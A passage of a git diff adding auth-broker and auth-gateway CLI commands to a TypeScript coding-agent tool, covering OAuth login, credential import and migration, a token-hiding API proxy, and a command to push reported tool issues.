Promise<void> { + if (flags.regenerate) { + const next = generateToken(); + await writeToken(next); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ token: next, path: getTokenFilePath() })}\n`); + } else { + process.stdout.write(`${next}\n`); + } + return; + } + const token = await ensureToken(); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ token, path: getTokenFilePath() })}\n`); + } else { + process.stdout.write(`${token}\n`); + } +} + +async function runLogin(flags: AuthBrokerCommandArgs["flags"]): Promise<void> { + const providerArg = flags.provider; + if (!providerArg) { + throw new Error("Usage: omp auth-broker login <provider> [--via=user@host]"); + } + const oauthProviders = new Set<string>(getOAuthProviders().map(p => p.id)); + if (!oauthProviders.has(providerArg)) { + throw new Error(`Unknown OAuth provider '${providerArg}'. Known: ${[...oauthProviders].sort().join(", ")}`); + } + if (flags.via) { + await runRemoteLogin(providerArg, flags.via, flags.dryRun ?? false); + return; + } + await runLocalLogin(providerArg as OAuthProvider); +} + +async function runLocalLogin(provider: OAuthProvider): Promise<void> { + // Spawn the pi-ai CLI in-process — it handles the per-provider OAuth dance + // and persists into the same SQLite store the broker uses. + const piAiCli = Bun.fileURLToPath(import.meta.resolve("@oh-my-pi/pi-ai/cli")); + const proc = Bun.spawn({ + cmd: [process.execPath, piAiCli, "login", provider], + stdin: "inherit", + stdout: "inherit", + stderr: "inherit", + }); + const exitCode = await proc.exited; + if (exitCode !== 0) { + throw new Error(`pi-ai login exited with code ${exitCode}`); + } +} + +async function runRemoteLogin(provider: string, via: string, dryRun: boolean): Promise<void> { + const port = CALLBACK_PORTS[provider]; + if (port === undefined) { + throw new Error( + `No known OAuth callback port for '${provider}'. Use device-code flow on the broker host directly.`, + ); + } + const sshArgs = [ + "-L", + `${port}:127.0.0.1:${port}`, + "-o", + "ExitOnForwardFailure=yes", + via, + `${APP_NAME} auth-broker login ${provider}`, + ]; + if (dryRun) { + process.stdout.write(`ssh ${sshArgs.map(a => (a.includes(" ") ? `'${a}'` : a)).join(" ")}\n`); + return; + } + const sshBin = $which("ssh"); + if (!sshBin) { + throw new Error("ssh binary not found in PATH"); + } + const proc = Bun.spawn({ + cmd: [sshBin, ...sshArgs], + stdin: "inherit", + stdout: "inherit", + stderr: "inherit", + }); + const exitCode = await proc.exited; + if (exitCode !== 0) { + throw new Error(`ssh exited with code ${exitCode}`); + } +} + +async function runLogout(flags: AuthBrokerCommandArgs["flags"]): Promise<void> { + const providerArg = flags.provider; + if (!providerArg) { + throw new Error("Usage: omp auth-broker logout <provider>"); + } + const store = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + store.deleteAuthCredentialsForProvider(providerArg, "logged out by user"); + process.stdout.write(`Logged out of ${providerArg}\n`); + } finally { + store.close(); + } +} + +// ─── CLIProxyAPI import ───────────────────────────────────────────────── + +/** + * Maps the `type` field of a CLIProxyAPI credential JSON to the omp provider id. + * The filename also encodes the type (e.g. `claude-foo@bar.json`), but the + * in-file `type` is authoritative — we only fall back to filename if absent. + */ +const CLIPROXY_TYPE_TO_PROVIDER: Record<string, string> = { + claude: "anthropic", + codex: "openai-codex", + gemini: "google-gemini-cli", + antigravity: "google-antigravity", + "gemini-cli": "google-gemini-cli", +}; + +interface CliProxyCredentialJson { + type?: string; + access_token?: string; + refresh_token?: string; + id_token?: string; + expired?: string; + last_refresh?: string; + email?: string; + account_id?: string; + disabled?: boolean; +} + +interface ImportPlanEntry { + sourceFile: string; + provider: string; + email: string | null; + accountId: string | null; + expiresAt: number; + disabled: boolean; + credential: OAuthCredential; +} + +function resolveCliProxyProvider(json: CliProxyCredentialJson, filename: string, overrideId?: string): string | null { + if (overrideId && overrideId.length > 0) return overrideId; + const typeField = json.type?.trim().toLowerCase(); + if (typeField && CLIPROXY_TYPE_TO_PROVIDER[typeField]) return CLIPROXY_TYPE_TO_PROVIDER[typeField]; + // Fall back to filename prefix: `<type>-<email>.json` + const base = path.basename(filename, ".json").toLowerCase(); + for (const prefix in CLIPROXY_TYPE_TO_PROVIDER) { + const providerId = CLIPROXY_TYPE_TO_PROVIDER[prefix]; + if (base.startsWith(`${prefix}-`) || base === prefix) return providerId; + } + return null; +} + +function parseCliProxyExpiry(raw: string | undefined): number | null { + if (!raw) return null; + // CLIProxyAPI writes RFC3339-ish dates. `Date.parse` handles both `Z` and offsets. + const ms = Date.parse(raw); + if (!Number.isFinite(ms)) return null; + return ms; +} + +async function collectImportSources(target: string): Promise<string[]> { + const stat = await fs.stat(target); + if (stat.isFile()) return [target]; + if (!stat.isDirectory()) { + throw new Error(`Import source is neither file nor directory: ${target}`); + } + const entries = await fs.readdir(target, { withFileTypes: true }); + const files: string[] = []; + for (const entry of entries) { + if (!entry.isFile()) continue; + if (!entry.name.endsWith(".json")) continue; + files.push(path.join(target, entry.name)); + } + files.sort(); + return files; +} + +async function loadImportPlan( + target: string, + overrideProvider: string | undefined, + includeDisabled: boolean, +): Promise<{ entries: ImportPlanEntry[]; skipped: Array<{ file: string; reason: string }> }> { + const files = await collectImportSources(target); + const entries: ImportPlanEntry[] = []; + const skipped: Array<{ file: string; reason: string }> = []; + for (const file of files) { + let json: CliProxyCredentialJson; + try { + json = (await Bun.file(file).json()) as CliProxyCredentialJson; + } catch (err) { + skipped.push({ file, reason: `unreadable JSON: ${String(err)}` }); + continue; + } + if (json.disabled === true && !includeDisabled) { + skipped.push({ file, reason: "credential marked disabled (use --include-disabled to import anyway)" }); + continue; + } + const provider = resolveCliProxyProvider(json, file, overrideProvider); + if (!provider) { + skipped.push({ + file, + reason: `cannot determine omp provider from type=${json.type ?? "?"} (pass --provider to override)`, + }); + continue; + } + if (!json.access_token || !json.refresh_token) { + skipped.push({ file, reason: "missing access_token or refresh_token" }); + continue; + } + const expiresAt = parseCliProxyExpiry(json.expired); + if (expiresAt === null) { + skipped.push({ file, reason: `cannot parse expired=${json.expired ?? "?"}` }); + continue; + } + const email = typeof json.email === "string" && json.email.length > 0 ? json.email : null; + const accountId = typeof json.account_id === "string" && json.account_id.length > 0 ? json.account_id : null; + const credential: OAuthCredential = { + type: "oauth", + access: json.access_token, + refresh: json.refresh_token, + expires: expiresAt, + ...(email !== null ? { email } : {}), + ...(accountId !== null ? { accountId } : {}), + }; + entries.push({ + sourceFile: file, + provider, + email, + accountId, + expiresAt, + disabled: json.disabled === true, + credential, + }); + } + return { entries, skipped }; +} + +function describeImportEntry(entry: ImportPlanEntry): string { + const ident = entry.email ?? entry.accountId ?? "(no identity)"; + const stale = entry.expiresAt < Date.now() ? " [expired]" : ""; + const disabled = entry.disabled ? " [disabled]" : ""; + return `${entry.provider}: ${ident}${stale}${disabled} from ${entry.sourceFile}`; +} + +async function runImport(flags: AuthBrokerCommandArgs["flags"]): Promise<void> { + const target = flags.source; + if (!target) { + throw new Error("Usage: omp auth-broker import <file|dir> [--provider=<id>] [--include-disabled] [--dry-run]"); + } + const resolvedTarget = path.resolve(target.startsWith("~") ? target.replace(/^~/, os.homedir()) : target); + const { entries, skipped } = await loadImportPlan(resolvedTarget, flags.provider, flags.includeDisabled === true); + + if (flags.json) { + process.stdout.write( + `${JSON.stringify({ + dryRun: flags.dryRun === true, + imported: flags.dryRun + ? [] + : entries.map(e => ({ provider: e.provider, email: e.email, file: e.sourceFile })), + plan: entries.map(e => ({ + provider: e.provider, + email: e.email, + accountId: e.accountId, + expiresAt: e.expiresAt, + disabled: e.disabled, + file: e.sourceFile, + })), + skipped, + })}\n`, + ); + } + + if (!flags.json) { + for (const skip of skipped) { + process.stdout.write(`${chalk.yellow("skip")} ${skip.file}: ${skip.reason}\n`); + } + } + + if (entries.length === 0) { + if (!flags.json) process.stdout.write(`No importable credentials in ${resolvedTarget}.\n`); + return; + } + + if (flags.dryRun === true) { + if (!flags.json) { + process.stdout.write(`Dry run — would import ${entries.length} credential(s):\n`); + for (const entry of entries) process.stdout.write(` ${describeImportEntry(entry)}\n`); + } + return; + } + + const brokerConfig = await resolveAuthBrokerConfig(); + if (brokerConfig) { + const client = new AuthBrokerClient({ url: brokerConfig.url, token: brokerConfig.token }); + for (const entry of entries) { + try { + await client.uploadCredential(entry.provider, entry.credential); + if (!flags.json) { + process.stdout.write(`${chalk.green("uploaded")} ${describeImportEntry(entry)} → ${brokerConfig.url}\n`); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ error: message, file: entry.sourceFile })}\n`); + } else { + process.stdout.write(`${chalk.red("failed")} ${describeImportEntry(entry)}: ${message}\n`); + } + process.exitCode = 1; + } + } + return; + } + + const store = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + for (const entry of entries) { + store.upsertAuthCredentialForProvider(entry.provider, entry.credential); + if (!flags.json) process.stdout.write(`${chalk.green("imported")} ${describeImportEntry(entry)}\n`); + } + } finally { + store.close(); + } +} + +// ─── Migrate: local SQLite + env → broker ────────────────────────────── + +interface MigratePlanEntry { + source: "local-sqlite" | "env"; + provider: string; + credential: AuthCredential; + identity: string; +} + +interface MigrateSkip { + source: "local-sqlite" | "env"; + provider: string; + identity: string; + reason: string; +} + +function credentialIdentity(provider: string, credential: AuthCredential): string { + if (credential.type === "api_key") return "(api key)"; + return credential.email ?? credential.accountId ?? credential.projectId ?? `<${provider} oauth>`; +} + +/** + * Build the set of "identities already on the broker" so re-runs are idempotent. + * For OAuth, identity = email|accountId|projectId. For api_key, we collapse + * to a single marker per provider (broker has no concept of "multiple api keys + * per provider with different identities"; upsert would coalesce them). + */ +function indexBrokerSnapshot(snapshot: { + credentials: Array<{ + provider: string; + credential: { type: string; email?: string; accountId?: string; projectId?: string }; + }>; +}): Map<string, Set<string>> { + const out = new Map<string, Set<string>>(); + for (const entry of snapshot.credentials) { + const ids = out.get(entry.provider) ?? new Set<string>(); + if (entry.credential.type === "api_key") { + ids.add("@api_key"); + } else { + if (entry.credential.email) ids.add(`email:${entry.credential.email}`); + if (entry.credential.accountId) ids.add(`accountId:${entry.credential.accountId}`); + if (entry.credential.projectId) ids.add(`projectId:${entry.credential.projectId}`); + } + out.set(entry.provider, ids); + } + return out; +} + +function brokerAlreadyHas(existing: Map<string, Set<string>>, provider: string, credential: AuthCredential): boolean { + const ids = existing.get(provider); + if (!ids) return false; + if (credential.type === "api_key") return ids.has("@api_key"); + if (credential.email && ids.has(`email:${credential.email}`)) return true; + if (credential.accountId && ids.has(`accountId:${credential.accountId}`)) return true; + if (credential.projectId && ids.has(`projectId:${credential.projectId}`)) return true; + return false; +} + +async function runMigrate(flags: AuthBrokerCommandArgs["flags"]): Promise<void> { + const brokerConfig = await resolveAuthBrokerConfig(); + if (!brokerConfig) { + throw new Error( + "OMP_AUTH_BROKER_URL must be set (or `auth.broker.url` in config.yml). `migrate` uploads local credentials to a configured broker.", + ); + } + if (flags.fromLocal !== true) { + throw new Error( + "`omp auth-broker migrate` requires an explicit source. Pass `--from-local` to migrate from the local SQLite store and env vars.", + ); + } + + const client = new AuthBrokerClient({ url: brokerConfig.url, token: brokerConfig.token }); + const snapshotResult = await client.fetchSnapshot(); + if (snapshotResult.status !== 200) throw new Error("Auth broker returned no snapshot"); + const existing = indexBrokerSnapshot(snapshotResult.snapshot); + + const plan: MigratePlanEntry[] = []; + const skipped: MigrateSkip[] = []; + + // 1. Local SQLite rows. + const localDbPath = getAgentDbPath(); + const localStore = await SqliteAuthCredentialStore.open(localDbPath); + const plannedApiKeyProviders = new Set<string>(); + try { + for (const row of localStore.listAuthCredentials()) { + // Skip placeholder sentinels that pi-ai treats as "authenticated via + // out-of-band mechanism" (Bedrock/Vertex `<authenticated>`). They + // aren't real keys and uploading them would store garbage on the + // broker. Mirrors the env-var path's guard below. + if (row.credential.type === "api_key" && row.credential.key === "<authenticated>") { + skipped.push({ + source: "local-sqlite", + provider: row.provider, + identity: "(api key)", + reason: "placeholder sentinel '<authenticated>' is not a real key", + }); + continue; + } + const identity = credentialIdentity(row.provider, row.credential); + if (row.credential.type === "oauth" && flags.includeOauth !== true) { + skipped.push({ + source: "local-sqlite", + provider: row.provider, + identity, + reason: "OAuth from local SQLite skipped by default (use --include-oauth)", + }); + continue; + } + if (brokerAlreadyHas(existing, row.provider, row.credential)) { + skipped.push({ + source: "local-sqlite", + provider: row.provider, + identity, + reason: "already on broker", + }); + continue; + } + if (row.credential.type === "api_key" && plannedApiKeyProviders.has(row.provider)) { + skipped.push({ + source: "local-sqlite", + provider: row.provider, + identity, + reason: "another local api_key for this provider already planned", + }); + continue; + } + if (row.credential.type === "api_key") plannedApiKeyProviders.add(row.provider); + plan.push({ source: "local-sqlite", provider: row.provider, credential: row.credential, identity }); + } + } finally { + localStore.close(); + } + + // 2. Env-var API keys (opt-in). + if (flags.includeEnv === true) { + for (const provider of listProvidersWithEnvKey()) { + const envValue = getEnvApiKey(provider); + if (!envValue) continue; + if (envValue === "<authenticated>") continue; // Bedrock/Vertex sentinels — not literal keys. + const credential: AuthCredential = { type: "api_key", key: envValue }; + if (brokerAlreadyHas(existing, provider, credential)) { + skipped.push({ + source: "env", + provider, + identity: "(api key)", + reason: "already on broker (provider has an api_key)", + }); + continue; + } + // Also skip if local SQLite already produced an entry for this provider in this batch. + if (plan.some(p => p.provider === provider && p.credential.type === "api_key")) { + skipped.push({ + source: "env", + provider, + identity: "(api key)", + reason: "local SQLite already supplied an api_key for this provider", + }); + continue; + } + plan.push({ source: "env", provider, credential, identity: "(api key)" }); + } + } + + if (flags.json) { + process.stdout.write( + `${JSON.stringify({ + dryRun: flags.dryRun === true, + plan: plan.map(p => ({ source: p.source, provider: p.provider, identity: p.identity })), + skipped, + })}\n`, + ); + } else { + for (const skip of skipped) { + process.stdout.write( + `${chalk.yellow("skip")} [${skip.source}] ${skip.provider} ${skip.identity}: ${skip.reason}\n`, + ); + } + } + + if (plan.length === 0) { + if (!flags.json) process.stdout.write("Nothing to migrate.\n"); + return; + } + + if (flags.dryRun === true) { + if (!flags.json) { + process.stdout.write(`Dry run — would upload ${plan.length} credential(s):\n`); + for (const entry of plan) { + process.stdout.write(` [${entry.source}] ${entry.provider} ${entry.identity}\n`); + } + } + return; + } + + for (const entry of plan) { + try { + await client.uploadCredential(entry.provider, entry.credential); + if (!flags.json) { + process.stdout.write(`${chalk.green("uploaded")} [${entry.source}] ${entry.provider} ${entry.identity}\n`); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ error: message, provider: entry.provider })}\n`); + } else { + process.stdout.write(`${chalk.red("failed")} [${entry.source}] ${entry.provider}: ${message}\n`); + } + process.exitCode = 1; + } + } +} + +async function runStatus(flags: AuthBrokerCommandArgs["flags"]): Promise<void> { + const cfg = await resolveAuthBrokerConfig(); + if (!cfg) { + const message = "No auth-broker configured (set OMP_AUTH_BROKER_URL to enable)."; + if (flags.json) process.stdout.write(`${JSON.stringify({ ok: false, reason: "not_configured" })}\n`); + else process.stdout.write(`${chalk.yellow(message)}\n`); + return; + } + const client = new AuthBrokerClient({ url: cfg.url, token: cfg.token }); + try { + const health = await client.healthz(); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ url: cfg.url, ...health })}\n`); + } else { + process.stdout.write(`${chalk.green("OK")} ${cfg.url} (version=${health.version ?? "unknown"})\n`); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ ok: false, url: cfg.url, error: message })}\n`); + } else { + process.stdout.write(`${chalk.red("FAILED")} ${cfg.url}: ${message}\n`); + } + process.exitCode = 1; + } +} + +export async function runAuthBrokerCommand(cmd: AuthBrokerCommandArgs): Promise<void> { + switch (cmd.action) { + case "serve": + await runServe(cmd.flags); + return; + case "token": + await runToken(cmd.flags); + return; + case "login": + await runLogin(cmd.flags); + return; + case "logout": + await runLogout(cmd.flags); + return; + case "import": + await runImport(cmd.flags); + return; + case "migrate": + await runMigrate(cmd.flags); + return; + case "status": + await runStatus(cmd.flags); + return; + default: { + // Exhaustive check. + const _exhaustive: never = cmd.action; + throw new Error(`Unknown auth-broker action: ${String(_exhaustive)}`); + } + } +} + +export { ACTIONS as AUTH_BROKER_ACTIONS }; + +// Touch `$` so Bun's tree-shaker keeps the shell helper imported (used by future verbs). +void $; diff --git a/packages/coding-agent/src/cli/auth-gateway-cli.ts b/packages/coding-agent/src/cli/auth-gateway-cli.ts new file mode 100644 index 000000000..5ffb98c68 --- /dev/null +++ b/packages/coding-agent/src/cli/auth-gateway-cli.ts @@ -0,0 +1,342 @@ +/** + * `omp auth-gateway` command handlers. + * + * Boots a forward-proxy server that lets less-trusted clients (the macOS + * usage widget, robomp containers, …) make provider API calls without ever + * seeing the access token. The gateway is itself a broker client and + * resolves credentials through the configured broker (via the same + * `OMP_AUTH_BROKER_URL` / `auth.broker.url` precedence used elsewhere). + * + * Sub-verbs: + * - `serve [--bind=…]` — boots the gateway against the configured broker. + * - `token` / `token --regenerate` — manages the gateway bearer token file. + * - `status` — prints the locally-stored gateway token and bind hint. + */ +import * as crypto from "node:crypto"; +import * as fs from "node:fs/promises"; +import * as path from "node:path"; +import { + type Api, + AuthBrokerClient, + AuthStorage, + DEFAULT_AUTH_GATEWAY_BIND, + type GeneratedProvider, + getBundledModels, + getBundledProviders, + type Model, + RemoteAuthCredentialStore, + type SnapshotResponse, + startAuthGateway, +} from "@oh-my-pi/pi-ai"; +import { getConfigRootDir, isEnoent, VERSION } from "@oh-my-pi/pi-utils"; +import chalk from "chalk"; +import { type AuthBrokerClientConfig, resolveAuthBrokerConfig } from "../session/auth-broker-config"; + +export type AuthGatewayAction = "serve" | "token" | "status"; + +export interface AuthGatewayCommandArgs { + action: AuthGatewayAction; + flags: { + json?: boolean; + bind?: string; + regenerate?: boolean; + /** + * Disable bearer-token auth on inbound requests. Useful when the gateway + * is bound to loopback (the default `127.0.0.1:4000`) and you don't want + * to wire token-paste plumbing into every local client. + */ + noAuth?: boolean; + }; +} + +const ACTIONS: readonly AuthGatewayAction[] = ["serve", "token", "status"]; + +function getTokenFilePath(): string { + return path.join(getConfigRootDir(), "auth-gateway.token"); +} + +async function readToken(): Promise<string | null> { + try { + const raw = await Bun.file(getTokenFilePath()).text(); + const trimmed = raw.trim(); + return trimmed.length > 0 ? trimmed : null; + } catch (err) { + if (isEnoent(err)) return null; + throw err; + } +} + +async function writeToken(token: string): Promise<void> { + const file = getTokenFilePath(); + await fs.mkdir(path.dirname(file), { recursive: true, mode: 0o700 }); + await fs.writeFile(file, token, { mode: 0o600 }); + try { + await fs.chmod(file, 0o600); + } catch { + // Best-effort (e.g. Windows). + } +} + +/** + * Atomically create the token file, refusing to clobber an existing one. + * Returns `true` on success, `false` when the file already existed (so the + * caller re-reads it instead of racing another concurrent `ensureToken`). + */ +async function createTokenExclusive(token: string): Promise<boolean> { + const file = getTokenFilePath(); + await fs.mkdir(path.dirname(file), { recursive: true, mode: 0o700 }); + try { + // `wx` = O_CREAT | O_EXCL — fails with EEXIST if the file is already there. + await fs.writeFile(file, token, { flag: "wx", mode: 0o600 }); + } catch (err) { + if ((err as NodeJS.ErrnoException).code === "EEXIST") return false; + throw err; + } + try { + await fs.chmod(file, 0o600); + } catch { + // Best-effort (e.g. Windows). + } + return true; +} + +function generateToken(): string { + return crypto.randomBytes(32).toString("base64url"); +} + +async function ensureToken(): Promise<string> { + const existing = await readToken(); + if (existing) return existing; + const token = generateToken(); + if (await createTokenExclusive(token)) return token; + // Another concurrent invocation won the create race; read what they wrote. + const fromRace = await readToken(); + if (fromRace) return fromRace; + // File existed-then-disappeared between EEXIST and read; last resort, write + // our generated token unconditionally so callers don't see an empty string. + await writeToken(token); + return token; +} + +function createBrokerClient(brokerConfig: AuthBrokerClientConfig): AuthBrokerClient { + return new AuthBrokerClient({ url: brokerConfig.url, token: brokerConfig.token }); +} + +async function fetchBrokerSnapshot(client: AuthBrokerClient): Promise<SnapshotResponse> { + const result = await client.fetchSnapshot(); + if (result.status !== 200) throw new Error("Auth broker returned no initial snapshot"); + return result.snapshot; +} + +async function runServe(flags: AuthGatewayCommandArgs["flags"]): Promise<void> { + const brokerConfig = await resolveAuthBrokerConfig(); + if (!brokerConfig) { + throw new Error( + "`omp auth-gateway serve` requires OMP_AUTH_BROKER_URL (or `auth.broker.url`/`auth.broker.token` in config.yml). The gateway is itself a broker client.", + ); + } + const bind = flags.bind ?? DEFAULT_AUTH_GATEWAY_BIND; + const gatewayToken = flags.noAuth ? null : await ensureToken(); + + // Build a broker-backed AuthStorage — same pattern as discoverAuthStorage() + // in sdk.ts. The gateway never touches local SQLite. + const client = createBrokerClient(brokerConfig); + const initialSnapshot = await fetchBrokerSnapshot(client); + const store = new RemoteAuthCredentialStore({ client, initialSnapshot }); + // Refresh + usage both flow through the store's broker hooks automatically — + // `RemoteAuthCredentialStore.refreshOAuthCredential` and `.fetchUsageReports`. + // AuthStorage discovers them when no explicit option overrides them, so the + // gateway only needs to construct the store and pass it in. + const storage = new AuthStorage(store, { + sourceLabel: `broker ${brokerConfig.url}`, + }); + await storage.reload(); + + // Build the model resolver + catalog from pi-ai's bundled metadata, scoped + // to providers we hold credentials for. Format handlers ask `resolveModel` + // to translate a client-requested `model` field into a pi-ai `Model<Api>` + // before dispatch; `listModels` powers `/v1/models`. + const snapshot = storage.exportSnapshot(); + const providersWithCreds = new Set<string>(); + for (const entry of snapshot.credentials) providersWithCreds.add(entry.provider); + const modelById = new Map<string, Model<Api>>(); + for (const provider of getBundledProviders()) { + if (!providersWithCreds.has(provider)) continue; + for (const model of getBundledModels(provider as GeneratedProvider)) { + // First-write-wins so a canonical model id collisions across providers + // stick to the provider listed first by getBundledProviders. + if (!modelById.has(model.id)) modelById.set(model.id, model); + } + } + + const handle = startAuthGateway({ + storage, + bind, + bearerTokens: gatewayToken ? [gatewayToken] : [], + version: VERSION, + resolveModel: (id: string) => modelById.get(id), + listModels: () => modelById.values(), + }); + process.stdout.write(`auth-gateway listening on ${handle.url}\n`); + if (gatewayToken) { + process.stdout.write(`bearer token: ${getTokenFilePath()} (chmod 0600)\n`); + } else { + process.stdout.write(`auth: disabled (--no-auth) — any client can call this gateway\n`); + } + process.stdout.write(`upstream broker: ${brokerConfig.url}\n`); + + const stopped = Promise.withResolvers<void>(); + let shutdownStarted = false; + const stop = async (signal: NodeJS.Signals): Promise<void> => { + if (shutdownStarted) return; + shutdownStarted = true; + process.stdout.write(`\nReceived ${signal}, shutting down...\n`); + let closeError: unknown; + try { + await handle.close(); + } catch (error) { + closeError = error; + } finally { + storage.close(); + } + if (closeError) { + stopped.reject(closeError); + } else { + stopped.resolve(); + } + }; + const onSigint = (): void => { + void stop("SIGINT"); + }; + const onSigterm = (): void => { + void stop("SIGTERM"); + }; + process.once("SIGINT", onSigint); + process.once("SIGTERM", onSigterm); + + try { + await stopped.promise; + } finally { + process.off("SIGINT", onSigint); + process.off("SIGTERM", onSigterm); + } +} + +async function runToken(flags: AuthGatewayCommandArgs["flags"]): Promise<void> { + if (flags.regenerate) { + const next = generateToken(); + await writeToken(next); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ token: next, path: getTokenFilePath() })}\n`); + } else { + process.stdout.write(`${next}\n`); + } + return; + } + const token = await ensureToken(); + if (flags.json) { + process.stdout.write(`${JSON.stringify({ token, path: getTokenFilePath() })}\n`); + } else { + process.stdout.write(`${token}\n`); + } +} + +async function runStatus(flags: AuthGatewayCommandArgs["flags"]): Promise<void> { + const token = await readToken(); + const brokerConfig = await resolveAuthBrokerConfig(); + const tokenFile = getTokenFilePath(); + if (!brokerConfig) { + const status = { + ready: false, + reason: "not_configured", + tokenFile, + tokenPresent: token !== null, + broker: null, + brokerConfigured: false, + brokerAuthenticated: false, + }; + if (flags.json) { + process.stdout.write(`${JSON.stringify(status)}\n`); + } else { + process.stdout.write(`${chalk.yellow("No broker configured.")} Set OMP_AUTH_BROKER_URL.\n`); + process.stdout.write( + `token: ${status.tokenPresent ? chalk.green("present") : chalk.red("missing")} at ${status.tokenFile}\n`, + ); + } + process.exitCode = 1; + return; + } + + try { + const snapshot = await fetchBrokerSnapshot(createBrokerClient(brokerConfig)); + const tokenPresent = token !== null; + const status = { + ready: tokenPresent, + reason: tokenPresent ? null : "token_missing", + tokenFile, + tokenPresent, + broker: brokerConfig.url, + brokerConfigured: true, + brokerAuthenticated: true, + credentialCount: snapshot.credentials.length, + }; + if (flags.json) { + process.stdout.write(`${JSON.stringify(status)}\n`); + } else { + const brokerLine = `upstream broker: ${brokerConfig.url} (${snapshot.credentials.length} credential${ + snapshot.credentials.length === 1 ? "" : "s" + })`; + process.stdout.write(`${tokenPresent ? chalk.green("ready") : chalk.yellow("not ready")} ${brokerLine}\n`); + process.stdout.write( + `token: ${tokenPresent ? chalk.green("present") : chalk.red("missing")} at ${status.tokenFile}\n`, + ); + if (!tokenPresent) { + process.stdout.write( + "Run `omp auth-gateway token` or `omp auth-gateway serve` to create a bearer token.\n", + ); + } + } + if (!tokenPresent) process.exitCode = 1; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + const status = { + ready: false, + reason: "broker_unavailable", + tokenFile, + tokenPresent: token !== null, + broker: brokerConfig.url, + brokerConfigured: true, + brokerAuthenticated: false, + error: message, + }; + if (flags.json) { + process.stdout.write(`${JSON.stringify(status)}\n`); + } else { + process.stdout.write(`${chalk.red("FAILED")} upstream broker: ${brokerConfig.url}: ${message}\n`); + process.stdout.write( + `token: ${status.tokenPresent ? chalk.green("present") : chalk.red("missing")} at ${status.tokenFile}\n`, + ); + } + process.exitCode = 1; + } +} + +export async function runAuthGatewayCommand(cmd: AuthGatewayCommandArgs): Promise<void> { + switch (cmd.action) { + case "serve": + await runServe(cmd.flags); + return; + case "token": + await runToken(cmd.flags); + return; + case "status": + await runStatus(cmd.flags); + return; + default: { + const _exhaustive: never = cmd.action; + throw new Error(`Unknown auth-gateway action: ${String(_exhaustive)}`); + } + } +} + +export { ACTIONS as AUTH_GATEWAY_ACTIONS }; diff --git a/packages/coding-agent/src/cli/grievances-cli.ts b/packages/coding-agent/src/cli/grievances-cli.ts index c2f8277a5..fdf675761 100644 --- a/packages/coding-agent/src/cli/grievances-cli.ts +++ b/packages/coding-agent/src/cli/grievances-cli.ts @@ -1,9 +1,9 @@ /** - * CLI handler for `omp grievances` — view reported tool issues from auto-QA. + * CLI handler for `omp grievances` — view, clean, and manually push reported tool issues. */ -import { Database } from "bun:sqlite"; import chalk from "chalk"; -import { getAutoQaDbPath } from "../tools/report-tool-issue"; +import { Settings } from "../config/settings"; +import { flushGrievances, openAutoQaDb } from "../tools/report-tool-issue"; interface GrievanceRow { id: number; @@ -30,20 +30,12 @@ export interface CleanGrievancesOptions { json?: boolean; } -function openDb(readonly: boolean): Database | null { - try { - // bun:sqlite rejects `{ readonly: false }` — it requires either readonly, - // readwrite, or create flags to be explicit. Use the default constructor - // (readwrite + create) for write mode and only pass `readonly: true` when - // listing. - return readonly ? new Database(getAutoQaDbPath(), { readonly: true }) : new Database(getAutoQaDbPath()); - } catch { - return null; - } +export interface PushGrievancesOptions { + /** Emit the {@link FlushResult} as JSON instead of a status line. */ + json?: boolean; } - export async function listGrievances(options: ListGrievancesOptions): Promise<void> { - const db = openDb(true); + const db = openAutoQaDb(); if (!db) { if (options.json) { console.log("[]"); @@ -112,7 +104,7 @@ export async function cleanGrievances(options: CleanGrievancesOptions): Promise< return; } - const db = openDb(false); + const db = openAutoQaDb(); if (!db) { if (options.json) { console.log(JSON.stringify({ deleted: 0 })); @@ -161,3 +153,104 @@ export async function cleanGrievances(options: CleanGrievancesOptions): Promise< db.close(); } } + +// ─────────────────────────────────────────────────────────────────────────── +// Manual push (`omp grievances push`) +// ─────────────────────────────────────────────────────────────────────────── + +/** + * Single-line ANSI progress reporter. `update(done)` rewrites the line via + * `\r`; `finish()` newlines out so subsequent log lines land cleanly. On a + * non-TTY stdout (CI, pipes) both calls no-op so log files don't fill with + * carriage-return noise. + */ +interface ProgressBar { + update(done: number): void; + finish(): void; +} + +function makeProgressBar(total: number, width = 30): ProgressBar { + const isTty = !!process.stdout.isTTY; + if (!isTty || total === 0) { + return { update: () => undefined, finish: () => undefined }; + } + const render = (done: number): void => { + const ratio = Math.min(1, done / total); + const filled = Math.round(ratio * width); + const bar = `${"█".repeat(filled)}${"░".repeat(width - filled)}`; + const pct = `${Math.floor(ratio * 100) + .toString() + .padStart(3, " ")}%`; + process.stdout.write(`\r${chalk.cyan("Pushing")} [${bar}] ${pct} ${done}/${total}`); + }; + render(0); + return { + update: render, + finish: () => process.stdout.write("\n"), + }; +} + +/** + * Manually drain every unpushed grievance to the configured backend, + * ignoring the user-facing consent gate (manual push is the user's + * explicit "yes ship these now" intent). + * + * Requires endpoint configuration (default `qa.omp.sh/v1/grievances`). + */ +export async function pushGrievances(options: PushGrievancesOptions): Promise<void> { + const db = openAutoQaDb(); + if (!db) { + if (options.json) { + console.log(JSON.stringify({ pushed: 0, ok: false, skipped: true, reason: "no_db" })); + } else { + console.log(chalk.dim("No grievances database found — nothing to push.")); + } + return; + } + const settings = await Settings.init(); + let bar: ProgressBar = { update: () => undefined, finish: () => undefined }; + let total = 0; + + try { + const result = await flushGrievances(db, settings, { + bypassConsent: true, + onStart: t => { + total = t; + if (!options.json) bar = makeProgressBar(t); + }, + onProgress: pushed => bar.update(pushed), + }); + bar.finish(); + + if (options.json) { + console.log(JSON.stringify(result)); + return; + } + + if (result.skipped) { + console.log( + chalk.yellow( + "Push skipped — no endpoint configured. Set `dev.autoqaPush.endpoint` or `PI_AUTO_QA_PUSH_URL`.", + ), + ); + return; + } + if (total === 0) { + console.log(chalk.dim("Nothing to push — all grievances are already shipped.")); + return; + } + if (result.ok) { + console.log(chalk.green(`Pushed ${result.pushed}/${total} grievance${result.pushed === 1 ? 